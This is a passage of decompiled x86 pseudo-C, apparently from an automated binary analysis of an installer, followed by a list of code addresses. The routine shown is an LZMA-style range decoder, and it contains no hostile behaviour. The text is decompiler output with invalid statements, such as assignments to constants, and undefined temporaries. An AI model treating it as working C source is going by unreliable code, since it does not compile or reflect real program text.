												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                    0x00000000
                                    0x0040711c
                                    0x0040711c
                                    0x00407120
                                    0x0040712d
                                    0x00407137
                                    0x00000000
                                    0x00407122
                                    0x00407122
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00407056
                                    0x00407059
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x004073ce
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x004075e5
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x004075fd
                                    0x00407601
                                    0x00407601
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00407441
                                    0x00407441
                                    0x00407447
                                    0x00407447
                                    0x00406be3
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00000000
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
